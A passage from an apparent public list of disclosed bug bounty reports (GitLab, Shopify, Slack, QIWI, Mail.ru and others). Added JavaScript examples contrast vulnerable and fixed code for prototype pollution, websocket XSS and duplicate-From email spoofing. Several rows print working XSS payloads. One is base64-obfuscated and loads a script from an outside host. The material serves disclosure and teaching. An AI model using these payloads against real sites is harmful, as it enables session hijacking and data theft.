| 407 | XSS | Stored XSS in groups, by naming the group with an XSS payload (`"><img src=x onerror=prompt(123)>`) and clicking New Project. | $2500 | GitLab | https://hackerone.com/reports/647130 |
| 408 | Improper access control | A sort_by issue on the jira_status field lets an attacker determine whether a report uses Jira. | $550 | HackerOne | https://hackerone.com/reports/955286 |
| 409 | XSS | Stored XSS on eaccounting.stage.vismaonline.com | $250 | Visma Public | https://hackerone.com/reports/897523 |
| 410 | CSRF | Part of the authenticity token used to generate CSRF tokens was disclosed. Using it, an attacker can generate valid CSRF tokens for any arbitrary route. | $500 | Ruby on Rails | https://hackerone.com/reports/732415 |
| 411 | Improper access control | Ability to publish any theme for free: extract the ID of the paid theme, then intercept the update of a free theme and replace its ID with the paid theme's ID. | $2000 | Shopify | https://hackerone.com/reports/927567 |
| 412 | Improper access control | Ability to publish any theme for free via a race condition when installing the theme: find a paid theme and click "Try theme"; while it is installing, issue the PublishLegacy call for a free theme, then intercept and modify the first GraphQL query to ThemesProcessingLegacy, replacing the theme ID with the paid theme's ID. | $2000 | Shopify | https://hackerone.com/reports/953083 |
| 413 | XSS | A file upload with a unicode character and an XSS payload causes the created page to execute the script. | $600 | WordPress | https://hackerone.com/reports/179695 |
| 414 | Code injection | XSS to RCE by uploading HTML as part of a snippet. The map function allows arbitrary inclusion of resources, leading to the ability to execute any command. There are also multiple issues with how payloads are stored in Slack's environment, allowing code to be hosted on trusted domains. | $1750 | Slack | https://hackerone.com/reports/783877 |
| 415 | XSS | Unsanitized input taken from websockets was rendered on the recipient's side, making XSS possible in support desk conversations and giving access to support tickets and client information. Payload: `ws.send('{"action":"send_message","data":{"type":2,"uuid":"katO0xuiIy","media_thumb":"xxdata\\" onerror=\\"eval(atob(\'dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vcGl0ci54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7\'));//","media_url":"media-url"},"uuid":"katO0xuiIy","token":"bz+OjfTeBL/BRozszXwKbT10voEb0crFVRWBktvQifQ=","projectId":1,"messengerType":9}')` | $500 | QIWI | https://hackerone.com/reports/512065 |
| 416 | Improper authentication | Due to improper parsing and display of the From address, it was possible to send emails from any @mail.ru address that passed DKIM and DMARC verification even though the email was spoofed. The bug occurs when there are two "From" headers and the spoofed address is added as an additional "From:" header. This is also a replay attack: it requires a previously sent and verified email from the address provider. | $150 | Mail.ru | https://hackerone.com/reports/731878 |
| 417 | IDOR | IDOR in dictor.mail.ru allowed an attacker to get any video's information through a GraphQL query. | $2500 | Mail.ru | https://hackerone.com/reports/924914 |
| 418 | Information disclosure | Config files were accessible for warofdragons.my.games, leaking database credentials and other information. | $150 | Mail.ru | https://hackerone.com/reports/786609 |
| 419 | CRLF injection | www.starbucks.com/email-prospectt was vulnerable to CRLF injection, allowing header injection (for example injecting CORS headers) or HTTP response splitting, which can be exploited further. | $250 | Starbucks | https://hackerone.com/reports/858650 |
| 420 | XSS | Stored XSS is possible if an attacker can upload files using Active Storage, by using the proxy functionality included in Ruby on Rails. | $500 | Ruby on Rails | https://hackerone.com/reports/949513 |
| 421 | XSS | Stored XSS in the post title on Imgur, using a standard `"><svg` payload. | $250 | Imgur | https://hackerone.com/reports/942859 |
| 422 | Logic bug | Email bypass for Shopify accounts that did not have Shopify IDs. A flaw in the flow allowed taking over these accounts without any verification. | $22,500 | Shopify | https://hackerone.com/reports/867513 |
| 423 | Information leak | Anonymous access to a Sidekiq process dashboard was possible on shopper.sbermarket.ru | $500 | Mail.ru | https://hackerone.com/reports/951190 |
| 424 | DoS | Browser-dependent DoS by injecting an invalid link: http://twitter.com:627732462 | | | |
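
Row 378 names the lodash prototype-pollution bug only by its outcome. The following is an added example, not code from the original page or from lodash: a minimal deep merge carrying the same class of flaw, the hardened version, and a check showing how a polluted `Object.prototype` turns into a crash in unrelated code. The function names and the attacker input are assumptions made for this example.

```javascript
// Added example, not code from the original page or from lodash: a minimal
// recursive merge carrying the classic prototype-pollution flaw, next to a
// hardened version, plus a check showing how the pollution becomes a DoS.

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable: recurses into every key of the attacker-controlled source,
// including "__proto__". JSON.parse yields an own property literally named
// "__proto__", while target["__proto__"] resolves to Object.prototype, so
// the recursion writes attacker keys onto every object in the process.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: refuse the three keys that reach a prototype, and only recurse
// into objects the target actually owns (never inherited ones).
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed attacker input, as it might arrive in a JSON request body.
// Overwriting Object.prototype.toString with a non-function makes any
// later string conversion of a plain object throw a TypeError, which is
// one way prototype pollution turns into a denial of service.
const ATTACKER_JSON = '{"__proto__":{"toString":"not a function"}}';

// Merge the attacker document into a fresh config with mergeFn, then do
// what unrelated code does all the time: stringify an object for a log
// line. Returns "crashed" if that throws and "ok" if it still works.
function renderAfterMerge(mergeFn) {
  const saved = Object.prototype.toString;
  try {
    mergeFn({}, JSON.parse(ATTACKER_JSON));
    const unrelated = { id: 1 };
    const text = `${unrelated}`;
    return text === '[object Object]' ? 'ok' : 'unexpected';
  } catch (e) {
    return e instanceof TypeError ? 'crashed' : 'unexpected';
  } finally {
    Object.prototype.toString = saved; // undo the pollution for the rest of the run
  }
}

console.log('unsafe merge:', renderAfterMerge(unsafeMerge)); // crashed
console.log('safe merge:  ', renderAfterMerge(safeMerge));   // ok
```

The key-denylist is the usual minimal fix; a stricter variant copies into objects created with `Object.create(null)` so there is no prototype to reach at all.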
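
Row 415 gives the websocket payload but not the rendering code that let it fire. As an added example (not QIWI's code), the snippet below shows the unsafe pattern, string interpolation of a received field into an `img` tag, next to an attribute-escaping fix, and a small tokenizer that lists which attributes a browser would see on the resulting tag in each case. The frame is constructed here; only the `media_thumb` and `media_url` field names are taken from the report.

```javascript
// Added example, not the vendor's code: the unsafe rendering pattern behind
// the websocket XSS above and an attribute-escaping fix. The frame is
// constructed; only the field names follow the report's payload.

// Constructed frame as the recipient's client would receive it. The
// media_thumb value closes the src attribute and smuggles in onerror.
const CONSTRUCTED_FRAME = JSON.stringify({
  action: 'send_message',
  data: {
    type: 2,
    media_thumb: 'xxdata" onerror="alert(document.domain)',
    media_url: 'media-url',
  },
});

// Vulnerable renderer: interpolates untrusted fields straight into markup.
function renderUnsafe(frame) {
  const { data } = JSON.parse(frame);
  return `<img src="${data.media_thumb}" data-url="${data.media_url}">`;
}

// Escape the characters that can terminate or alter a quoted attribute
// value; everything else is passed through unchanged.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed renderer: same markup, every untrusted value escaped for the
// attribute context it lands in.
function renderSafe(frame) {
  const { data } = JSON.parse(frame);
  return `<img src="${escapeAttr(data.media_thumb)}" data-url="${escapeAttr(data.media_url)}">`;
}

// Minimal tokenizer for the double-quoted attributes this template emits:
// returns the attribute names a browser would actually see on the tag.
function attributeNames(html) {
  const names = [];
  const re = /\s([A-Za-z][\w-]*)="[^"]*"/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1]);
  return names;
}

console.log(attributeNames(renderUnsafe(CONSTRUCTED_FRAME))); // [ 'src', 'onerror', 'data-url' ]
console.log(attributeNames(renderSafe(CONSTRUCTED_FRAME)));   // [ 'src', 'data-url' ]
```

In a real client, building the element with `document.createElement('img')` and `setAttribute` avoids the string-assembly step entirely; the escaper above is for code that has to keep emitting HTML text.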
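
Row 416 turns on a message carrying two From headers. The following added example (not Mail.ru's code) parses raw message headers, rejects anything with more or fewer than the single From header RFC 5322 allows, and then checks that the From domain aligns with the DKIM `d=` domain, which is the alignment DMARC relies on. Both messages, their domains and the signature tag values are constructed placeholders for this example.

```javascript
// Added example, not Mail.ru's code: a small header parser that enforces
// what RFC 5322 already requires (exactly one From header) and checks that
// its domain aligns with the DKIM signing domain, the alignment DMARC
// depends on. Both messages below are constructed; the signature values
// are placeholders, not real signatures.

// Constructed replay: a legitimately signed message from example.org with
// a second From header added by the attacker.
const SPOOFED_MESSAGE = [
  'DKIM-Signature: v=1; a=rsa-sha256; d=example.org; s=sel;',
  ' h=from:subject:date; bh=PLACEHOLDER; b=PLACEHOLDER',
  'From: Legit Sender <legit@example.org>',
  'Subject: Quarterly numbers',
  'From: Finance <finance@example.com>',
  'Date: Mon, 1 Jan 2024 00:00:00 +0000',
  '',
  'Please wire the funds today.',
].join('\r\n');

// Constructed clean message for comparison.
const CLEAN_MESSAGE = [
  'DKIM-Signature: v=1; a=rsa-sha256; d=example.org; s=sel;',
  ' h=from:subject:date; bh=PLACEHOLDER; b=PLACEHOLDER',
  'From: Legit Sender <legit@example.org>',
  'Subject: Quarterly numbers',
  'Date: Mon, 1 Jan 2024 00:00:00 +0000',
  '',
  'Numbers attached.',
].join('\r\n');

// Split the header block from the body, unfold continuation lines, and
// return every header as { name, value } with a lower-cased name.
function parseHeaders(raw) {
  const headerBlock = raw.split(/\r?\n\r?\n/)[0];
  const headers = [];
  for (const line of headerBlock.split(/\r?\n/)) {
    if (/^[ \t]/.test(line) && headers.length > 0) {
      headers[headers.length - 1].value += ' ' + line.trim(); // folded line
      continue;
    }
    const colon = line.indexOf(':');
    if (colon < 1) continue; // not a header line; ignored here
    headers.push({
      name: line.slice(0, colon).trim().toLowerCase(),
      value: line.slice(colon + 1).trim(),
    });
  }
  return headers;
}

function headerValues(raw, name) {
  const wanted = name.toLowerCase();
  return parseHeaders(raw).filter((h) => h.name === wanted).map((h) => h.value);
}

// Domain of the addr-spec in a From value, with or without a display name.
function addressDomain(fromValue) {
  const angle = /<([^>]+)>/.exec(fromValue);
  const addr = angle ? angle[1] : fromValue.trim();
  const at = addr.lastIndexOf('@');
  return at === -1 ? null : addr.slice(at + 1).toLowerCase();
}

// The d= tag of the first DKIM-Signature header, if any.
function dkimDomain(raw) {
  const sig = headerValues(raw, 'DKIM-Signature')[0];
  const m = sig ? /(?:^|;)\s*d=([^;\s]+)/.exec(sig) : null;
  return m ? m[1].toLowerCase() : null;
}

// Accept only a message with a single From header whose domain matches
// the DKIM signing domain; anything else is reported with a reason.
function acceptMessage(raw) {
  const froms = headerValues(raw, 'From');
  if (froms.length !== 1) {
    return { ok: false, reason: `expected exactly one From header, found ${froms.length}` };
  }
  const fromDomain = addressDomain(froms[0]);
  const signer = dkimDomain(raw);
  if (!fromDomain || !signer || fromDomain !== signer) {
    return { ok: false, reason: `From domain ${fromDomain} does not align with DKIM d=${signer}` };
  }
  return { ok: true, reason: 'single From header, aligned with DKIM d=' };
}

console.log(acceptMessage(SPOOFED_MESSAGE)); // { ok: false, reason: 'expected exactly one From header, found 2' }
console.log(acceptMessage(CLEAN_MESSAGE));   // { ok: true, reason: 'single From header, aligned with DKIM d=' }
```

The duplicate-header check is the part that matters for this report: once a second From header is tolerated, whichever one the client chooses to display decides what the user sees, regardless of which one the signature covered.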

Bug Bounty Reports is a GitHub repository by Robin.